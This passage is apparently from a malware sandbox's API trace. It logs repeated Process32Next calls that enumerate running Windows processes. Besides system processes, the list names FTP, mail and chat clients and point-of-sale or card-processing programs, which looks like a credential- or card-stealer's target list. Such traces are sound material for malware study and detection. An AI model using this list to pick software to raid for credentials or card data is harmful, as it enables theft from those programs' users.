lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0275.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.248] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0275.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0275.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0275.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0275.256] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0275.343] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.345] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.346] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.348] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.351] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.352] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.354] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0275.358] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0275.361] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0275.363] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.365] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0275.367] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0275.369] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0275.374] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0275.376] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0275.377] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.379] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0275.380] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.382] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.383] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.385] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0275.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0275.439] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0275.441] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0275.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0275.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0275.445] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0275.446] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0275.448] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0275.452] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0275.453] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0275.455] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0275.456] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0275.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0275.460] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0275.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0275.462] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0275.464] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0275.468] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0275.470] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0275.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0275.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0275.475] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0275.477] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0275.519] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0275.521] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0275.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0275.525] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0275.530] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0275.532] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0275.534] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0275.536] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0275.538] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0275.539] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0275.541] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0275.545] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0275.547] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0275.549] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0275.551] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0275.553] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0275.555] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0275.557] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0275.576] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0275.578] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0275.580] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0275.581] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0275.583] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0275.585] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0275.586] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0275.588] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0275.592] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0275.594] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0275.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0275.597] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, 